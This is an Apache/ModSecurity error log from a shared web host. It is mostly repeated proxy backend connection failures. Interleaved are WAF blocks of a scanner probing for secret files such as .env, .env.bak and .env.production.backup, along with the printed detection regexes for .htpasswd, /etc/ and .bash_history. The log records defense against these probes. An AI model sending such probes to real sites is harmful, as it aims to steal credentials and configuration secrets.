[Tue May 26 14:48:37.762509 2026] [proxy_http:error] [pid 648203:tid 648428] [client 5.255.125.104:52652] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.763022 2026] [proxy:error] [pid 648203:tid 648458] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.763096 2026] [proxy_http:error] [pid 648203:tid 648458] [client 5.255.125.104:52560] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.777445 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.5:35036] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/.env.bak"] [unique_id "ahVlbbEQDDtxJNiDrdTayQAAALI"]
[Tue May 26 14:48:37.812871 2026] [proxy:error] [pid 648203:tid 648457] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.812924 2026] [proxy_http:error] [pid 648203:tid 648457] [client 5.255.125.104:52518] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.813024 2026] [proxy:error] [pid 648203:tid 648367] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.813073 2026] [proxy_http:error] [pid 648203:tid 648367] [client 5.255.125.104:52426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.813208 2026] [proxy:error] [pid 648203:tid 648403] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.813258 2026] [proxy_http:error] [pid 648203:tid 648403] [client 5.255.125.104:52462] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.813481 2026] [proxy:error] [pid 648203:tid 648457] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.813511 2026] [proxy_http:error] [pid 648203:tid 648457] [client 5.255.125.104:52518] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.813865 2026] [proxy:error] [pid 648203:tid 648367] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.813906 2026] [proxy_http:error] [pid 648203:tid 648367] [client 5.255.125.104:52426] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.814121 2026] [proxy:error] [pid 648203:tid 648403] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.814163 2026] [proxy_http:error] [pid 648203:tid 648403] [client 5.255.125.104:52462] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.814406 2026] [proxy:error] [pid 648203:tid 648434] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.814475 2026] [proxy_http:error] [pid 648203:tid 648434] [client 5.255.125.104:52368] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.814572 2026] [proxy:error] [pid 648203:tid 648354] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.814618 2026] [proxy_http:error] [pid 648203:tid 648354] [client 5.255.125.104:52446] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.815180 2026] [security2:error] [pid 648203:tid 648425] [client 5.255.125.104:52400] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/api/.env"] [unique_id "ahVlbbEQDDtxJNiDrdTa0QAAAOE"]
[Tue May 26 14:48:37.815244 2026] [proxy:error] [pid 648203:tid 648354] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.815279 2026] [proxy_http:error] [pid 648203:tid 648354] [client 5.255.125.104:52446] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.815479 2026] [proxy:error] [pid 648203:tid 648434] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.815520 2026] [proxy_http:error] [pid 648203:tid 648434] [client 5.255.125.104:52368] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.815524 2026] [security2:error] [pid 648203:tid 648401] [client 5.255.125.104:52384] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahVlbbEQDDtxJNiDrdTa0gAAAMk"]
[Tue May 26 14:48:37.816604 2026] [proxy:error] [pid 648203:tid 648457] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.816651 2026] [proxy_http:error] [pid 648203:tid 648457] [client 5.255.125.104:52466] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.817237 2026] [proxy:error] [pid 648203:tid 648457] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.817272 2026] [proxy_http:error] [pid 648203:tid 648457] [client 5.255.125.104:52466] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.817662 2026] [proxy:error] [pid 648203:tid 648423] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.817732 2026] [proxy_http:error] [pid 648203:tid 648423] [client 5.255.125.104:52436] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.818327 2026] [proxy:error] [pid 648203:tid 648423] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.818376 2026] [proxy_http:error] [pid 648203:tid 648423] [client 5.255.125.104:52436] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.827310 2026] [proxy:error] [pid 648203:tid 648397] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.827352 2026] [proxy_http:error] [pid 648203:tid 648397] [client 5.255.125.104:52570] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.827435 2026] [proxy:error] [pid 648203:tid 648412] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.827473 2026] [proxy_http:error] [pid 648203:tid 648412] [client 5.255.125.104:52532] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.827648 2026] [proxy:error] [pid 648203:tid 648406] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.827707 2026] [proxy_http:error] [pid 648203:tid 648406] [client 5.255.125.104:52654] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.828022 2026] [proxy:error] [pid 648203:tid 648397] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.828055 2026] [proxy_http:error] [pid 648203:tid 648397] [client 5.255.125.104:52570] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.828155 2026] [proxy:error] [pid 648203:tid 648336] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.828199 2026] [proxy_http:error] [pid 648203:tid 648336] [client 5.255.125.104:52480] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.828264 2026] [proxy:error] [pid 648203:tid 648412] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.828294 2026] [proxy_http:error] [pid 648203:tid 648412] [client 5.255.125.104:52532] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.828445 2026] [proxy:error] [pid 648203:tid 648371] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.828484 2026] [proxy_http:error] [pid 648203:tid 648371] [client 5.255.125.104:52546] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.828713 2026] [proxy:error] [pid 648203:tid 648406] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.828800 2026] [proxy_http:error] [pid 648203:tid 648406] [client 5.255.125.104:52654] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.829074 2026] [proxy:error] [pid 648203:tid 648336] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.829118 2026] [proxy_http:error] [pid 648203:tid 648336] [client 5.255.125.104:52480] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.829592 2026] [proxy:error] [pid 648203:tid 648364] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.829686 2026] [proxy_http:error] [pid 648203:tid 648364] [client 5.255.125.104:52632] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.829904 2026] [proxy:error] [pid 648203:tid 648334] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.829954 2026] [proxy_http:error] [pid 648203:tid 648334] [client 5.255.125.104:52618] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.830401 2026] [proxy:error] [pid 648203:tid 648364] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.830471 2026] [proxy_http:error] [pid 648203:tid 648364] [client 5.255.125.104:52632] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.830570 2026] [proxy:error] [pid 648203:tid 648334] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.830604 2026] [proxy_http:error] [pid 648203:tid 648334] [client 5.255.125.104:52618] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.830809 2026] [proxy:error] [pid 648203:tid 648371] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.830847 2026] [proxy_http:error] [pid 648203:tid 648371] [client 5.255.125.104:52546] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.830986 2026] [security2:error] [pid 648203:tid 648444] [client 5.255.125.104:52416] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/backend/.env"] [unique_id "ahVlbbEQDDtxJNiDrdTa3gAAAPQ"]
[Tue May 26 14:48:37.831227 2026] [proxy:error] [pid 648203:tid 648453] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.831272 2026] [proxy_http:error] [pid 648203:tid 648453] [client 5.255.125.104:52526] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.831410 2026] [proxy:error] [pid 648203:tid 648351] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.831486 2026] [proxy_http:error] [pid 648203:tid 648351] [client 5.255.125.104:52586] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.831948 2026] [proxy:error] [pid 648203:tid 648453] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.831992 2026] [proxy_http:error] [pid 648203:tid 648453] [client 5.255.125.104:52526] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.832298 2026] [security2:error] [pid 648203:tid 648433] [client 5.255.125.104:52340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahVlbbEQDDtxJNiDrdTa3QAAAOk"]
[Tue May 26 14:48:37.832322 2026] [proxy:error] [pid 648203:tid 648351] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.832368 2026] [proxy_http:error] [pid 648203:tid 648351] [client 5.255.125.104:52586] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.832484 2026] [proxy:error] [pid 648203:tid 648406] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.832549 2026] [proxy_http:error] [pid 648203:tid 648406] [client 5.255.125.104:52642] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.832912 2026] [proxy:error] [pid 648203:tid 648371] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.832960 2026] [proxy_http:error] [pid 648203:tid 648371] [client 5.255.125.104:52638] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.833119 2026] [proxy:error] [pid 648203:tid 648353] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.833192 2026] [proxy_http:error] [pid 648203:tid 648353] [client 5.255.125.104:52598] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.833762 2026] [proxy:error] [pid 648203:tid 648406] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.833830 2026] [proxy_http:error] [pid 648203:tid 648406] [client 5.255.125.104:52642] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.833913 2026] [proxy:error] [pid 648203:tid 648371] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.833950 2026] [proxy_http:error] [pid 648203:tid 648371] [client 5.255.125.104:52638] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.834369 2026] [proxy:error] [pid 648203:tid 648353] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.834515 2026] [proxy_http:error] [pid 648203:tid 648353] [client 5.255.125.104:52598] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.834638 2026] [proxy:error] [pid 648203:tid 648419] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.834678 2026] [proxy_http:error] [pid 648203:tid 648419] [client 5.255.125.104:52494] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.835567 2026] [proxy:error] [pid 648203:tid 648419] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.835605 2026] [proxy_http:error] [pid 648203:tid 648419] [client 5.255.125.104:52494] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.880084 2026] [core:error] [pid 648203:tid 648362] [client 92.112.175.24:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:48:37.880099 2026] [core:error] [pid 648203:tid 648362] [client 92.112.175.24:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:48:37.883433 2026] [proxy:error] [pid 648203:tid 648391] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.883471 2026] [proxy_http:error] [pid 648203:tid 648391] [client 5.255.125.104:52506] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.884070 2026] [proxy:error] [pid 648203:tid 648391] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.884104 2026] [proxy_http:error] [pid 648203:tid 648391] [client 5.255.125.104:52506] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.886675 2026] [proxy:error] [pid 648203:tid 648426] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.886724 2026] [proxy_http:error] [pid 648203:tid 648426] [client 5.255.125.104:52658] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:37.887295 2026] [proxy:error] [pid 648203:tid 648426] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:37.887326 2026] [proxy_http:error] [pid 648203:tid 648426] [client 5.255.125.104:52658] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:38.755756 2026] [security2:error] [pid 648203:tid 648427] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlbrEQDDtxJNiDrdTa-AAAAOM"]
[Tue May 26 14:48:38.768273 2026] [proxy:error] [pid 648203:tid 648339] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:38.768343 2026] [proxy_http:error] [pid 648203:tid 648339] [client 5.255.125.104:52664] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:38.769177 2026] [proxy:error] [pid 648203:tid 648339] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:38.769219 2026] [proxy_http:error] [pid 648203:tid 648339] [client 5.255.125.104:52664] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:39.360969 2026] [security2:error] [pid 648203:tid 648447] [client 74.249.173.207:2570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVlb7EQDDtxJNiDrdTbIgAAAPc"]
[Tue May 26 14:48:39.493682 2026] [security2:error] [pid 648203:tid 648394] [client 104.207.45.121:39041] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlbrEQDDtxJNiDrdTa_AAAAMI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:48:39.682251 2026] [proxy:error] [pid 648203:tid 648410] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:39.682322 2026] [proxy_http:error] [pid 648203:tid 648410] [client 5.255.125.104:52416] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:39.682936 2026] [proxy:error] [pid 648203:tid 648410] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:39.682969 2026] [proxy_http:error] [pid 648203:tid 648410] [client 5.255.125.104:52416] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:40.381496 2026] [security2:error] [pid 648203:tid 648403] [client 5.255.125.104:52340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahVlcLEQDDtxJNiDrdTbOwAAAMs"]
[Tue May 26 14:48:40.468615 2026] [proxy:error] [pid 648203:tid 648354] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:40.468685 2026] [proxy_http:error] [pid 648203:tid 648354] [client 5.255.125.104:52400] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:40.469263 2026] [proxy:error] [pid 648203:tid 648354] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:40.469291 2026] [proxy_http:error] [pid 648203:tid 648354] [client 5.255.125.104:52400] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:40.470436 2026] [proxy:error] [pid 648203:tid 648414] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:40.470533 2026] [proxy_http:error] [pid 648203:tid 648414] [client 5.255.125.104:52384] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:40.471229 2026] [proxy:error] [pid 648203:tid 648414] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:40.471267 2026] [proxy_http:error] [pid 648203:tid 648414] [client 5.255.125.104:52384] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:40.826604 2026] [security2:error] [pid 648203:tid 648413] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlcLEQDDtxJNiDrdTbPgAAANU"]
[Tue May 26 14:48:41.406122 2026] [security2:error] [pid 648203:tid 648337] [client 5.255.125.104:52718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahVlcbEQDDtxJNiDrdTbVQAAAIk"]
[Tue May 26 14:48:41.434287 2026] [proxy:error] [pid 648203:tid 648400] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.434359 2026] [proxy_http:error] [pid 648203:tid 648400] [client 5.255.125.104:52340] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.434985 2026] [proxy:error] [pid 648203:tid 648400] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.435028 2026] [proxy_http:error] [pid 648203:tid 648400] [client 5.255.125.104:52340] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:48:41.540127 2026] [security2:error] [pid 648203:tid 648447] [client 5.255.125.104:52698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahVlcbEQDDtxJNiDrdTbXwAAAPc"]
[Tue May 26 14:48:41.552615 2026] [security2:error] [pid 648203:tid 648407] [client 5.255.125.104:52720] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahVlcbEQDDtxJNiDrdTbYQAAAM8"]
[Tue May 26 14:48:41.554445 2026] [security2:error] [pid 648203:tid 648394] [client 5.255.125.104:52776] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahVlcbEQDDtxJNiDrdTbZgAAAMI"]
[Tue May 26 14:48:41.554450 2026] [security2:error] [pid 648203:tid 648341] [client 5.255.125.104:52712] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.whitesun.in"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahVlcbEQDDtxJNiDrdTbYwAAAI0"]
[Tue May 26 14:48:41.554812 2026] [proxy:error] [pid 648203:tid 648404] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:48:41.554864 2026] [proxy_http:error] [pid 648203:tid 648404] [client 5.255.125.104:52680] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
